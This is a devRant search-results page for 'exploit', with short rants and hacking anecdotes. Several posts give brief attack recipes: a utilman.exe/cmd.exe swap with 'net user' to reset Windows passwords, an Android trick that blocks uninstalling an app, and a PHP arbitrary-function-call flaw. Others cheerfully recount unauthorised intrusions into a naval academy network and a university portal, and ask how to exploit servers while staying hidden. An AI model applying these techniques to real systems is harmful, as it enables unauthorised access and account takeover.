Do all the things like ++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatarSign Up
Get a devDuck
Rubber duck debugging has never been so cute! Get your favorite coding language devDuckBuy Now
Search - "exploit"
I'm, for obvious reasons, only going to talk about the attacks I went through and the *legal* ones I did 😅 😜
Let's first get some things clear/funny facts:
I've been doing offensive security since I was 14-15. Defensive since the age of 16-17. I'm getting close to 23 now, for the record.
First system ever hacked (metasploit exploit): Windows XP.
(To be clear, at home through a pentesting environment, all legal)
Easiest system ever hacked: Windows XP yet again.
Time it took me to crack/hack into today's OS's (remote + local exploits, don't remember which ones I used by the way):
Windows: XP - five seconds (damn, those metasploit exploits are powerful)
Windows Vista: Few minutes.
Windows 7: Few minutes.
Windows 10: Few minutes.
OSX (in general): 1 Hour (finding a good exploit took some time, got to root level easily aftewards. No, I do not remember how/what exactly, it's years and years ago)
Linux (Ubuntu): A month approx. Ended up using a Java applet through Firefox when that was still a thing. Literally had to click it manually xD
Linux: (RHEL based systems): Still not exploited, SELinux is powerful, motherfucker.
Keep in mind that I had a great pentesting setup back then 😊. I don't have nor do that anymore since I love defensive security more nowadays and simply don't have the time anymore.
Dealing with attacks and getting hacked.
Keep in mind that I manage around 20 servers (including vps's and dedi's) so I get the usual amount of ssh brute force attacks (thanks for keeping me safe, CSF!) which is about 40-50K every hour. Those ip's automatically get blocked after three failed attempts within 5 minutes. No root login allowed + rsa key login with freaking strong passwords/passphrases.
linu.xxx/much-security.nl - All kinds of attacks, application attacks, brute force, DDoS sometimes but that is also mostly mitigated at provider level, to name a few. So, except for my own tests and a few ddos's on both those domains, nothing really threatening. (as in, nothing seems to have fucked anything up yet)
How did I discover that two of my servers were hacked through brute forcers while no brute force protection was in place yet? installed a barebones ubuntu server onto both. They only come with system-default applications. Tried installing Nginx next day, port 80 was already in use. I always run 'pidof apache2' to make sure it isn't running and thought I'd run that for fun while I knew I didn't install it and it didn't come with the distro. It was actually running. Checked the auth logs and saw succesful root logins - fuck me - reinstalled the servers and installed Fail2Ban. It bans any ip address which had three failed ssh logins within 5 minutes:
Enabled Fail2Ban -> checked iptables (iptables -L) literally two seconds later: 100+ banned ip addresses - holy fuck, no wonder I got hacked!
One other kind/type of attack I get regularly but if it doesn't get much worse, I'll deal with that :)
Dealing with different kinds of attacks:
Web app attacks: extensively testing everything for security vulns before releasing it into the open.
Network attacks: Nginx rate limiting/CSF rate limiting against SYN DDoS attacks for example.
System attacks: Anti brute force software (Fail2Ban or CSF), anti rootkit software, AppArmor or (which I prefer) SELinux which actually catches quite some web app attacks as well and REGULARLY UPDATING THE SERVERS/SOFTWARE.
So yah, hereby :P38
Started talking with someone about general IT stuff. At some point we came to the subject of SSL certificates and he mentioned that 'that stuff is expensive' and so on.
Kindly told him about Let's Encrypt and also that it's free and he reacted: "Then I'd rather have no SSL, free certificates make you look like you're a cheap ass".
So I told him the principle of login/registration thingies and said that they really need SSL, whether it's free or not.
"Nahhh, then I'd still rather don't use SSL, it just looks so cheap when you're using a free certificate".
Hey you know what, what about you write that sentence on a whole fucking pack of paper, dip it into some sambal, maybe add some firecrackers and shove it up your ass? Hopefully that will bring some sense into your very empty head.
Not putting a secure connection on a website, (at all) especially when it has a FUCKING LOGIN/REGISTRATION FUNCTION (!?!?!?!!?!) is simply not fucking done in the year of TWO THOUSAND FUCKING SEVENTEEN.
'Ohh but the NSA etc won't do anything with that data'.
Has it, for one tiny motherfucking second, come to mind that there's also a thing called hackers? Malicious hackers? If your users are on hacked networks, it's easy as fuck to steal their credentials, inject shit and even deliver fucking EXPLOIT KITS.
Oh and you bet your ass the NSA will save that data, they have a whole motherfucking database of passwords they can search through with XKeyScore (snowden leaks).
Boot up a Linux live usb on a Windows machine, then rename cmd.exe to utilman.exe and after rebooting select accessibility options which now opens a command line and then 'net user username owned' to reset user 'username' password to 'owned'. Been using this for years..14
Navy story continued.
And continuing from the arp poisoning and boredom, I started scanning the network...
So I found plenty of WinXP computers, even some Win2k servers (I shit you not, the year was 201X) I decided to play around with merasploit a bit. I mean, this had to be a secure net, right?
Like hell it was.
Among the select douchebags I arp poisoned was a senior officer that had a VERY high idea for himself, and also believed he was tech-savvy. Now that, is a combination that is the red cloth for assholes like me. But I had to be more careful, as news of the network outage leaked, and rumours of "that guy" went amok, but because the whole sysadmin thing was on the shoulders of one guy, none could track it to me in explicit way. Not that i cared, actually, when I am pissed I act with all the subtleness of an atom bomb on steroids.
So, after some scanning and arp poisoning (changing the source MAC address this time) I said...
"Let's try this common exploit, it supposedly shouldn't work, there have been notifications about it, I've read them." Oh boy, was I in for a treat. 12 meterpreter sessions. FUCKING 12. The academy's online printer had no authentication, so I took the liberty of printing a few pages of ASCII jolly rogers (cute stuff, I know, but I was still in ITSec puberty) and decided to fuck around with the other PCs. One thing I found out is that some professors' PCs had the extreme password of 1234. Serious security, that was. Had I known earlier, I could have skipped a TON of pointless memorising...
Anyway, I was running amok the entire network, the sysad never had a chance on that, and he seemed preoccupied with EVERYTHING ELSE besides monitoring the net, like fixing (replacing) the keyboard for the commander's secretary, so...
BTW, most PCs had antivirus, but SO out of date that I didn't even need to encode the payload or do any other trick. An LDAP server was open, and the hashed admin password was the name of his wife. Go figure.
I looked at a WinXP laptop with a weird name, and fired my trusty ms08_067 on it. Passowrd: "aaw". I seriously thought that Ophcrack was broken, but I confirmed it. WTF? I started looking into the files... nothing too suspicious... wait a min, this guy is supposed to work, why his browser is showing porn?
Looking at the ""Deleted"" files (hah!) I fount a TON of documents with "SECRET" in them. Curious...
Decided to download everything, like the asshole I am, and restart his PC, AND to leave him with another desktop wallpaper and a text message. Thinking that he took the hint, I told the sysadmin about the vulnerable PCs and went to class...
In the middle of the class (I think it was anti-air warfare or anti-submarine warfare) the sysad burst through the door shouting "Stop it, that's the second-in-command's PC!".
Stunned silence. Even the professor (who was an officer). God, that was awkward. So, to make things MORE awkward (like the asshole I am) I burned every document to a DVD and the next day I took the sysad and went to the second-in-command of the academy.
Surprisingly he took the whole thing in quite the easygoing fashion. I half-expected court martial or at least a good yelling, but no. Anyway, after our conversation I cornered the sysad and barraged him with some tons of security holes, needed upgrades and settings etc. I still don't know if he managed to patch everything (I left him a detailed report) because, as I've written before, budget constraints in the military are the stuff of nightmares. Still, after that, oddly, most people wouldn't even talk to me.
God, that was a nice period of my life, not having to pretend to be interested about sports and TV shows. It would be almost like a story from highschool (if our highschool had such things as a network back then - yes, I am old).
https://google.com”f people near me wanted to show me something.
Person: Check out this zero-day exploit! I hacked into the system using a cloud-based cryptographically secure MD5 hash finite automata firewall HTML code API!
Me: Erm...what exactly did you hack?
Person: *shows screen while smirking*
It was a shell simulator website running “ping https://google.com”7
Alright, it's not perfect yet, only one post exists and the anonymous analytics are hardly working. Next to that I'm tired as fuck and need to go to bed so fuck it, here we go:
There's not much yet, just one tiny post :)
I have no clue if it will work or crash but I think it'll handle well enough 😅
If you'd find any security issues, please don't exploit them, just report them and I'll take a look asap!
The best I have seen and exploited was years ago with a web shop that allowed me to set my own check-out price by just inspecting the element and setting the desired price. It just happily advanced to the next step where they invoked the payment provider with my custom price. Unfortunately the shop doesn't exist anymore. I have encountered many more security leaks but this one was so easy and lucrative to exploit.3
It's funny, whenever the subject of facebook vs privacy comes up (mostly I don't even initiate those convo's), people always start to defend facebook when I say that I THINK that facebook is build to get people addicted to it and get them to stay on facebook as long as possible.
Haha, one of facebook's early investers/ex facebook presidents said the following in an interview:
“It’s a social-validation feedback loop, exactly the kind of thing that a hacker like myself would come up with, because you’re exploiting a vulnerability in human psychology.”
So even an ex president of facebook is admitting this.
I also found the folloing a good one:
The underlying thought process while creating platforms like Facebook or Instagram is something like “How do we consume as much of your time and conscious attention as possible?”
Last but not least, the part I found the most scary:
“God only knows what it’s doing to our children’s brains.”
Yes, I find this scary.
Oh yeah and for the people who are going to call bullshit on this one, I've got one source and if you search engine on the title of that article then you'll find loads of websites having that story:
The guy who reported a serious exploit in the company's system got arrested this morning. Safe to say the Hungarian public isn't very happy. I took the screenshot 5 minutes ago, it went up to 3.1k since then 😂8
What is the worst thing that can happen if you report a security vulnerability to a company?
Get banned by them!
I reported a vulnerability to a company on their Facebook page(cause they don't have an email id where I can report this) and they just banned me from their page. It's really annoying me now.
And the worst thing is that they have still not fixed the issue, I wonder why the hell they banned me then.
I am planning to exploit the vulnerability and teach them why security is so important now.22
I've recently red a blog post stating 'Google leaves x Million Android devices vulnerable to a new Exploit'
I don't really sympathize with Google, but it's simply the wrong message... It should be more like FUCK VENDORS, WHO WON'T SUPPLY UPDATES TO DEVICES OLDER THAN 1.5 YEARS
Seriously, it's them who make you stuck on outdated OS versions... Just imagine you could only install Windows Vista on your 2014 Lenovo ThinkPad, because it's considered outdated...
FUCK VENDORS (again, just in case)8
Alright, the blog seems to be running again and its not breaking yet which is a good sign :P.
Although nothing has changed on the front end yet, the backend has been partly rewritten to be more efficient and of course, post sorting based on posting date!
I'm aware of most of the front end issues so no need to tell me all of them again, I'll look at that tomorrow as I need sleep right now :(
If you'd find any bugs/security issues, please, don't exploit them but report them instead! I take security very seriously and will try to patch any security bug as soon as I can :)13
So apparently someone discovered an exploit in iOS devices which would make shitloads of devices jailbreakable and it can't be updated due to the chip being read-only.
I'm not an expert on this by far but hereby a source:
Again, I'm not an expert on this but it does seem awesome that a lot of devices (if I read it correctly) are jailbreakable now (when someone developed one with this exploit)!47
Story time :
Sometime ago I posted a video on YouTube on how to root a particular phone that was lying around at home. I was trying to demonstrate one of those "one-tap root" apps that were plentiful in the market. It so happened that one specific version of Framaroot and one particular method of exploit works for that device. I even verified this by trying different versions and it didn't work. So in the description it was mentioned to use ONLY this version that worked. Few days later there were atleast 5 dislikes and comments that it didn't work on some other version.
That's how I understood how stupid and dumb people can get.7
The company i work for has a jenkins server (for people that don't know jenkins, it's an automated build service that gets the latest git updates, pulls them and then builds, tests and deploys it)
Because it builds the software, people were scared to update it so we were running version 1.x for a long time, even when an exploit was found... Ooh boy did they learn from that...
The jenkins server had a hidden crypto miner running for about 5 days...
I don't know why we don't have detectors for that stuff... (like cpu load being high for 15 minutes)
I even tried to strengthen our security... You know basic stuff LIKE NOT SAVING PASSWORDS TO A GOOGLE SPREADSHEET! 😠
But they shoved it asside because they didn't have time... I tried multiple times but in the end i just gave up...13
Jokes aside, this got me thinking html is most used and most successful hacking tool out there.
99.99% of the time it's far easier to socially engineer and phish for existing credentials that scan networks, sniff ports and look for vulnerable versions of software, new vulnerabilities etc.
We (people) are ad always will be a zero day exploit.7
I have a Kali Linux VM running on my Windows machine. I decide to try and exploit the Windows machine (THAT THE VM WAS RUNNING ON) because of a vulnerability with smb that requires NO user interaction. I decided to make my computer shoot its own legs and I thought "Hey, this is gonna be fine."
Aaaaand the whole system crashed on me.3
Dear people who think Microsoft buying GitHub is fine because Microsoft is more supportive of open source than before.
Here's the facts.
1) Microsoft is a large tech company investing in many things. That's a fact.
2) If Microsoft were to exploit GitHub, it would be a benefit to other departments in Microsoft. This is also a fact.
(For example, if tomorrow GitHub was tied to azure or some annoying shit like that.)
3) If such exploitation occurs, it will most likely be to the detriment of the free community of developers. This is a highly probable outcome.
4) The only question now is this.
"Does Microsoft care about open source enough to cut down on potential profit."
The answer of any sane, unbiased individual had to be no.
This is why people leave GitHub today. It is NOT because some childish hatred for Microsoft. In fact, I would've personally moved out of GitHub if "any" other large tech company had bought it, thereby compromising it's neutrality.
So this story is from my University days. I was in the 6th semester back then, studying CS.
My University website was pretty shitty. Basically it was one of those old ass website that said "Best viewed in IE8". Anyway, I was snooping about the website, trying to find some news regarding an event.
I logged into my account, and randomly browsed into the leave request portal. This was a basic HTML form where students could apply for leaves from the classes and see the status of the leaves, if they have been granted or not. I noticed that the link to the request portal from the student login welcome page was actually something like http://univ.com/student/index.php/..., here 1234567 was my student ID. Yep, it was hardcore into the page, and sent as a GET request on being clicked. That was their idea of authentication I guess. I change the student ID to someone else's, and it let me login as that person.
Long story short, I wrote a little python script to login as every person from the starting of student IDs, till the end, then submit a leave request with a random dumb reason like "can't come, at the strip club" or "going for sex change operation". What I did not know was that when a request is submitted, a text message is also sent to the student's guardians phone number. I ran the script.
That day, over 1000 parents received text messages from the University saying that their kids have applied for a leave from random date to random date for some retarded reason. It was a blast. Students were talking about how someone had "Hacked" into the system.4
It has been bugging the shit out of me lately... the sheer number of shit-tier "programmers" that have been climbing out of the woodwork the last few years.
I'm not trying to come across as elitist or "holier than thou", but it's getting ridiculous and annoying. Even on here, you have people who "only do frontend development" or some other lame ass shit-stain of an excuse.
When I first started learning programming (PHP was my first language), it wasn't because I wanted to be a programmer. I used to be a member (my account is still there, in fact) of "HackThisSite", back when I was about 12 years old. After hanging out long enough, I got the hint that the best hackers are, in essence, programmers.
Want to learn how to do SQL injection? Learn SQL - write a program that uses an SQL database, and ask yourself how you would exploit your own software.
Want to reverse engineer the network protocol of some proprietary software? Learn TCP/IP - write a TCP/IP packet filter.
Back then, a programmer and a hacker were very much one in the same. Nowadays, some kid can download Python, write a "hello, world" program and they're halfway to freelancing or whatever.
It's rare to find a programmer - a REAL programmer, one who knows how the systems he develops for better than the back of his hand.
These days, I find people want the instant gratification that these simpler languages provide. You don't need to understand how virtual memory works, hell many people don't even really understand C/C++ pointers - and that's BASIC SHIT right there.
Put another way, would you want to take your car to a brake mechanic that doesn't understand how brakes work? I sure as hell wouldn't.
Watching these "programmers" out there who don't have a fucking clue how the code they write does what it does, is like watching a grown man walk around with a kid's toolbox full or plastic toys calling himself a mechanic. (I like cars, ok?!)
Python, AngularJS, Bootstrap, etc. They're all tools and they have their merits. But god fucking dammit, they're not the ONLY damn tools that matter. Stop making excuses *not* to learn something, Mr."IOnlyDoFrontEnd".
Coding ain't Lego's, fuckers.38
While watching Computerphile's video on the new atom bombing exploit.
Actually, He is kinda right 😂1
I make a typo in the username
"username doesn't exist"
I fix the typo and mess up the password
... I smell a potential exploit here...7
Sports commenter at AI vs AI deathmatches.
It would probably go like this:
- UltimateGod the Second launches half of the US nuclear missiles to NorthernEurope!
I guess that's it for the poor bugger.
- WankerBot69 tries to delay its doom by channeling old 4chan archives into a devastating ddos attack. UGtS' logic processe go down for a few nanoseconds... Ugh, that's NASTY! It doesn't even have a mother
- Missiles still going up. Looks like UGtS confused the imperial and metric system just like its predecessor.
- WB69 is now has the upper hand. It just used a SMB exploit and is bow encrypting UGtS's storage.
- UGtS is down. We all hope UltimateGod the third will do better. For now, all hail our catevolent overlord WankerBot69.
- See you next time on Bot Armaggedon folks!
I hacked a browser game a few years ago for fun and the exploit I found and used was basically this:
$f = $_GET['f'];
$p = $_GET['p'];
So it was possible to pass a function and it's parameter in the URL to the server. The author used this to include() sub pages. I to highlight_file()s.2
I sent all the required documents, all you have to do is sign. Why do you have to hit me with an email asking if the "male" staying with me is actually a friend or a boyfriend when it didn't bother you at all when you didn't know whether he's a penis-wielder or a sinkhole-bearer?
Then goes the declaration of your concern for my safety (safety from the dangers of the male kind?) because I'm like your own child. You ask me if my parents would get mad about a man staying with me. I'm already in my 20's. I'm not an extra virgin coconut oil. Oh boy, if you only knew, you'd get a heart attack. Sometimes I feel like my physical appearance or general image doesn't match the foul-mouthed, disgusting, psychotic little fuck that I really am inside.
I'm just frustrated and need to let it out. People showing me they care embarrasses me (hard to explain) and I also find it hard to believe them. In my experience, people do that so they can extract private information from you and then later use it to exploit or humiliate you. It doesn't only happen in the tech world.
I don't hate my landlord, she's nice. I just really hate the "too close" relationships culture here. I know it's her place and she has the right to know who's staying here, the rest of the questions are just a little too extreme for me no matter how good the intention is. I honestly don't know what she's expecting.
That's the random rant. Now if you will excuse me, I'm gonna rip someone's stomach open, shove my head in, and motorboat his intestines. I want to see if he giggles. Why is my face red? Definitely not from embarrassment!
Me: *finds exploit in site at work*
Developer of site: "You talk bs"
Me: "lemme show ya"
While I was trying to demo it, the guy quickly patched it xD (making it look as if it didn't work in the first place)
I just found a new WhatsApp Crash Exploit. Full denial of service right there. An attacker could send a message to a Chat (be it private Chat or group Chat) and everyone who receives the message has no chance of starting WhatsApp again. It crashes and won't restart.
Tested on latest version on Samsung Galaxy S6 and S8. Don't know if it works on other versions but I am pretty sure it does. (It's midnight here, noone online to test)
The fun thing is, I knew this Bug for a long time but when I last tested it, nothing happened. Which means this Crash is only possible because someone at WhatsApp programmed a new Feature...21
Just spent the entire day of which should have been the start of vacation fighting off a second wave of ransomware on one of our production servers. Gandcrab 5.2 anyone?
Turns out an exploit in our MySQL daemon allowed some fucking Chinese hackermonkey to upload a trojan and remote execute it. Thousands of angry customers, me the only one available and able to fix shit and patch up firewalls and system.
And now I get the pleasure of working on what I should have been doing today, another fire that MUST be put out today.
Fuck you deadlines. Fuck you Chinese hackers. In fact, FML.3
A follow up for this rant : https://devrant.com/rants/1429631/...
its morning and i have been awoke all night, but i am so happy and feel like crying seeing you people's response. :''''') Thank-You for helping a young birdie like me from getting exploit.
In Summery, I am successfully out of this trickery, but with cowardice, a little exploited and being continuously nagged by my friend as a 'fool'.
Although i would be honest, i did took a time to take my decision and got carried away by his words.
After a few hours of creating a group, he scheduled a conference call , and asked me to submit the flow by which my junior devs will work.
At that time i was still unclear about weather to work or not and had just took a break from studies. So thought of checking the progress and after a few minutes, came up with a work-flow, dropped in the group and muted it.
At night i thought of checking my personal messages , and that guy had PMed me that team is not working, check on their progress. This got me pissed and i diverted the topic by asking when he would be mailing my letter of joining.
His fucking reply to this was :"After the project gets completed!"
(One more Example of his attempts to be manipulative coming up, but along with my cowardice ) :/
WTF? with a team like this and their leader being 'me'( who still calls him noob after 2 internships and 10 months android exp), this project would have taken at least one month and i was not even counting myself in the coding part(The Exams).
So just to clarify what would be the precise date by which he is expecting the task, to which he said "27th"(i.e, tomorrow!)
I didn't responded. And rather checked about the details of the guy( knew that the company was start-up, but start-ups does sound hopeful, if they are doing it right) .A quick social media search gave me the results that he is a fuckin 25 year old guy who just did a masters and started this company. there was no mention of investors anywhere but his company's linkedin profile showed up and with "11-50" members.
After half an hour i told him that am not in this anymore, left the group and went back to study.(He wanted to ask for reasons, but i denied by saying a change of mind ,personal problems, etc)
Well the reality is over but here comes the cowardice part:
1)Our team was working on a private repo hosted on my account and i voluntarily asked him to take back the ownership, just to come out of this safely w/o pissing him off.
2)The "test" he took of me was the wireframe given by their client and which was the actual project we 5 were working on. So, as a "test", i created 15 activities of their client's app and have willingly transferred it to them.
3) in my defence, i only did it because (i) i feared this small start-up could harm my reputation on open platforms like linkedin and (ii)the things i developed were so easy that i don't mind giving them. they were just ui, designed a lot quickly but except that, they were nothing(even a button needs a code in the backend to perform something and i had not done it) . moreover, the guys working under me had changed a lot of things, so i felt bad for them and dropped the idea of damaging it.
Right now am just out of sleep, null of thoughts and just wondering weather am a good person, a safe player or just a stupid, easily manipulated fool
But Once again My deepest regard from my heart for @RustyCookie , @geaz ,@tarstrong ,and @YouAreAPIRate for a positive advice.
My love for devrant is growing everyday <3 <3 <3 <36
So today I found a way to break into any Apple Mac (provided the exploit hasn't been fixed by the owner) and access all private files, as long as I have physical access to it, in less than 5 minutes.
After finding this, a quick Google on the method reveals this has been a workaround for years.
And to think I once praised Apple for their security standards.
Edit: this was done to an in-house Mac that my company own, and had been password locked by a member of staff who had been fired, but held important company documents on the computer. It was in no way a breach of privacy.9
watching the online course for CEH... dude used the Death Star as a tangible example of how exploits work.
IDK if I should love it for the nerdiness, or be slightly sad that someone needs that type of example of what a vulnerability vs an exploit is, when they're going for the Certified Ethical Hacker certification...
Might be better in an introduction to Network Security class?
Also, while discussing the security, usability, and functionality triangle, he reference the Staples "Easy Button" - does one thing, not very secure, and not very functional (in that it has more than one function)...1
So my story has some little backstory.
I got into computers and technology because of my dad. He was very enthusiastic when I was little and when I grew older and started my apprenticeship as a software developer he was really proud. Note that he never learned anything like that. He just loved computers and games.
Now to the story itself.
I learned more and more, also about networking and came to the conclusion that our slow internet and rare internet problems probably come from stock/weird configurations. But my dads proud probably told him thats a thing he still has to do as the dad. But it annoyed me so much that I booted into kali linux, loaded an exploit to get the web admin passwort and cracked it within a minute. 😎
Finally I was able to configure everything correctly ( channels were spammed from neighbours so I switched to very unused and the disturbions got less ).
TL;DR: Dad didnt want me to configure our router and didnt give me the admin password, so I booted Kali Linux and used an exploit to get it myself 😎😎3
Fuck sake, so my bank has been migrating/rolling out new IT system and app/site have been broken for about a week (others noted evidence of devs debugging in production)
Assuming I don't lose my money as some mischievous assholes will inevitably exploit the fuck up, and rob the bank, I will be moving my funds to a different bank...
In mean time I'm trying to prepare for uni, and they're making a ton of semi-random changes in addition to rolling out a site with course details and info along those line, and good fucking god is it bad.
Is is slow as fuck? Check. Does it use never-seen-before naming for standard things? Check! Is the UI pulled from late 90's? YOOU BETCHA! Are the pages bloated with unnecessary content? Fuck yeah! Do I get SQL exceptions when I finally locate my course? Of course I do. Does clicking "back" take me back to the landing page instead of previous page, when I'm several steps deep? .....
I could keep going, but don't feel like ranting and feel more like punching someone in the throat.repeatedly.
Unpaid internships are the worst thing. You exploit young people and promise them experience. Seriously business makes tons of money yet they come with ways to exploit a young person in IT. I think it is evil.11
A node package, event-stream. Was infected. Basically, the exploit seems to steal data from mining cryptocurrencies. What was amazing was the github repo owner's attitude about it. I would normally agree with it not being his issue anymore if it weren't because:
1. The pendejo did not archive the repo to indicate that he is free of fault and not his anymore.
2. You can't just entrust a fucking software lib to any pendejo that asks.
3. Eat a dick nigga
I'm a little confused here. How are "viruses" different from "exploits" in Linux? The way I see it, they're the exact same thing. Although "exploit" makes it sound cool 😂16
It's cute how most companies think that someone will take the time to personally hack them. Like nah mate there's countless bots running around the internet like a rabid pack of dogs sniffing ip addresses and running exploit, one of the stragglers will pick you off...
A developer said to me: developers may hurry to finish the project before deadline that they might miss many security bugs specially in the updates. That a creative hacker will later take his time and exploit them.
Is it correct ?4
The site I work on is a market where you can buy magnets for dolors, insomniaque, bla bla bla (I don't believe a sec in this).
Just saying that to settle that 80% of our customers are +45 years old. They weren't born with a computer in their hands, and they sometimes manage to make a lot of mess in the site.
We are based in France, and we sell the most in France (no shit) and Switzerland. And this is the third time that a Swiss pass a command, puts all her address in Switzerland EXCEPT for the country (still on France) so she doesn't have to pay the shipping fee. I should do something about that, like a regex when verifying the zip code, but I have more urgent work to do, and the best has to come.
This smartass doesn't know she is the joke, because by saying she is in France, she has to pay the VAT that she wouldn't have if she said she was in Switzerland. She buys in general for around 350 €, so she has ~ 70€ (20%) in VAT, and she would only pay 14€ in shipping fee.
Maybe one day she'll see how dumb she is (my boss already mailed her so she pays attention to it, no change). But I think I would have set the regex by then.
I really just came across this on a legit apartment rental website.
I can see no possible way for this to go wrong.
No possible way that anyone could exploit this... 🙃19
How do you handle narcissist managers?
Who look at you not as human beeing but as a thing to exploit for personal gain? Sure there's the business side (capitalism) but the human side of it bothers me.5
I'm performing a pentest for my client.
So after scanning my client's network I understood they're using IIS 4.5 and windows server 2012 (or 2012 R2)
I know the systems are real old.
And there are known exploits for them.
The tricky part is I have to stay hidden and I only have my own credentials for logging in to the asp page. (Uploading a script is almost crossed cuz it will reveal my identity)
Also I have access to the local network with some of the other employees user/pass.
Any recommendation for exploiting and staying hidden at the same time ?
One more question : will exploits for newer versions work for the older ones necessarily?8
Android flow I’ve found(fixed in android 8, working on 7.1.1):
To make app uninstallable by the normal user make the app device administrator, add “android.permission.SYSTEM_ALERT_WINDOW” to the manifest and make sure it’s not granted by the user.
Now when you try to uninstall the app, it tells you to disable it from device administrators but the device administrator disable dialog is System Window handled by the app itself and if the app has this permission but not granted, settings will crash with SecurityException leaving the app untouched.4
I spent the last 5 hours solving this FUCKING GREAT challenge and I'm finally done 🎉
It's hxp CTF btw, check it out3
Ibwish I had remembered this when the weekly theme was office pranks.
In the first or second year of high school we covered basic internet security. Stuff like don't follow suspicious urls, don't open suspicious emails and such.
Our teacher let us play around with some sort of simulated desktop environment, where we could execute some hacks like ad popups and such on each other's environment, if we fell for the trap.
Anyways, one hack I found interesting was a hack, that lockes a user out of their virual desktop, until he enters a password, that will be displayed on his environment.
Yes, a very interesting hack, because it contains two obvious yet major design flaws, which I could exploit 😈
1. It's case sensitive
In itself not a problem, but combined with #2, it's fatal.
Depending on your font, you probably have no idea what exactly I just typed.
Let's just say, the font displayed uppercase i and lowercase L completely undifferentiable.
Guess whom I let suffer.
It was our teacher, who had to demonstrate us some things and who was connected to the same network.
I swear, nothing beats that feeling when your tearcher has go come to you and embarrassingly ask you to "unhack" them, because they can't type it 😂1
1. It's gonna be more and more specialized - to the point where we'll equal or even outdo the medical profession. Even today, you can put 100 techs/devs into a room and not find two doing the same job - that number will rise with the advent of even more new fields, languages and frameworks.
2. As most end users enjoy ignoring all security instructions, software and hardware will be locked down. This will be the disadvantage of developers, makers and hackers equally. The importance of social engineering means the platform development will focus on protecting the users from themselves, locking out legitimate tinkerers in the process.
3. With the EU getting into the backdoor game with eTLS (only 20 years after everyone else realized it's shit), informational security will reach an all-time low as criminals exploit the vulnerabilities that the standard will certainly have.
4. While good old-fashioned police work still applies to the internet, people will accept more and more mass surveillance as the voices of reason will be silenced. Devs will probably hear more and more about implementing these or joining the resistance.
5. We'll see major leaks, both as a consequence of mass-surveillance (done incompetently and thus, insecurely) and as activist retaliation.
6. As the political correctness morons continue invading our communities and projects, productivity will drop. A small group of more assertive devs will form - not pretty or presentable, but they - we - get shit done for the rest.
7. With IT becoming more and more public, pseudo-knowledge, FUD and sales bullshit will take over and, much like we're already seeing it in the financial sector, drown out any attempt of useful education. There will be a new silver-bullet, it will be useless. Like the rest. Stick to brass (as in IDS/IPS, Firewall, AV, Education), less expensive and more effective.
8. With the internet becoming a part of the real life without most people realizing it and/or acting accordingly, security issues will have more financial damages and potentially lethal consequences. We've already seen insulin pumps being hacked remotely and pacemakers' firmware being replaced without proper authentication. This will reach other areas.
9. After marijuana is legalized, dev productivity will either plummet or skyrocket. Or be entirely unaffected. Who cares, I'll roll the next one.
10. There will be new JS frameworks. The world will turn, it will rain.1
If I exploit ms server 2012 through a wifi hotspot , but logged in to someone else's account (assume it was sniffed) , and I do it using msfconsole connected to the tor with torify command , also I spoof my mac ,
will I stay 100% anonymous ?
If not , what can be done ?45
I've been interested in security for years but despite knowing the theory I've always had this disconnect with actually doing it, about two years ago I finally managed to find and exploit my first cross-site scripting vulnerability in my companies Product whilst doing some routine acceptance testing. It was a penny drop moment for me which has led to some very interesting projects and It was pretty badass.
Widget "hack" in secondary.
When I was around 13 or 14 I was enrolled at a public school in the UK. In an effort to try be eco friendly, the students and a IT technicain teamed up to try and create a widget that would track the consumption of printer credit used by all users (staff and students).
At first, I was just playing around with the homepage source code but eventually noticed the widget had separate code within the page.
Because all of the computers were interconnected, I grabbed the source code of the home page and put it into a notepad editor.
I used the intranet to look up staff names and student login usernames. I replaced my user ID with several staff members.
Boom, I could see how much paper they had used, how much they owed the library etc. May not be as impressive as others exploits but some staff were in debt by hundreds and never paid back a penny.
Hope you liked my story.2
Ideal dev job would be teaching kids code. Probably a side-gig at a local school.
Main gig would be writing code to exploit the "push to prod" Internet of Things things. Security on that is garbage. 🚮5
Malwares are nasty applications, that can spy on you, use your computer as an attacker or encrypt your files and hold them on ransom.
The reason that malware exists, is because how the file system works. On Windows, everything can access everything. Of course, there are security measures, like needing administrator permissions to edit/delete a file, but they are exploitable.
If the malware is not using an exploit, nothing is there to stop a user from unknowingly clicking the yes button, when an application requests admin rights.
If we want to stop viruses, in the first place, we need to create a new file-sharing system.
Imagine, that every app has a partition, and only that app can access it.
Currently, when you download a Word document, you would go ahead, start up Word, go into the Downloads folder and open the file.
In the new file-sharing system, you would need to click "Send file to Word" in your browser, and the browser would create a copy of the file in a transfer-partition. Then, it would signal to Word, saying "Hey! Here's a file that I sent to you, copy it to your partition please!". After that, Word just copies the file to its own partition, signals "Ok! I'm done!", and then the browser deletes the file from the shared partition.
A little change in the interface, but a huge change in security.
The permission system would be a better UAC. The best way I can describe it is when you install an app on Android. It shows what permission the app wants, and you could choose to install it, or not to.
Replace "install" with "grant" and that's what I imagined.
Of course, there would be blacklisted permissions, that only kernel-level processes have access to, like accessing all of the partitions, modifying applications, etc.
What do you think?7
One of two ways.
1. Alot of opensource companies will startup hiring developers based on what contributions they provide
2. The current companies will fire most of the devs to exploit free work from opensource devs offering pennies as bug bounties while only keeping very few maintainers.
Pentesting for undisclosed company. Let's call them X as to not get us into trouble.
We are students and are doing our first pentest at an actual company instead of assignments at school. So we're very anxious. But today was a good day.
We found some servers with open ports so we checked a few of them out. I had a set of them with a bunch of open ports like ftp and... 8080. Time to check this out.
"please install flash player"... Security risk 1 found!
System seemed to be some monitoring system. Trying to log in using admin admin... Fucking works. Group loses it cause the company was being all high and mighty about being secure af. Other shit is pretty tight though.
Able to see logs, change password, add new superuser, do some searches for USERS_LOGGEDIN_TODAY! I shit you not, the system even had SUGGESTIONS for usernames to search for. One of which had something to do with sftp and auth keys. Unfortunatly every search gave a SQL syntax error. Used sniffing tools to maybe intercept message so we could do some queries of our own but nothing. Query is probably not issued from the local machine.
Tried to decompile the flash file but no luck. Only for some weird lines and a few function names I presume. But decompressing it and opening it in a text editor allowed me to see and search text. No GET or POST found. No SQL queries or name checks or anything we could think of.
That's all I could do for today. So we'll have to think of stuff for next week. We've already planned xss so maybe we can do that on this server as well.
We also found some older network printers with open telnet. Servers with a specific SQL variant with a potential exploit to execute terminal commands and some ftp and smb servers we need to check out next week.
Hella excited about this!
If you guys have any suggestions let us know. We are utter noobs when it comes to this.6
mods are asleep.
all aboard the ++ train
++ all the comments in the thread. once you reach the end, post a comment. only post one comment. board the train.19
10K bump but salary is probably still below market for the skills I have... Most likely reason? Trump tax cuts...
I can't showcase my skills in interviews assuming I get any... Not motivated in cramming or studying those useless algorithm questions that have little correlation to actual work.
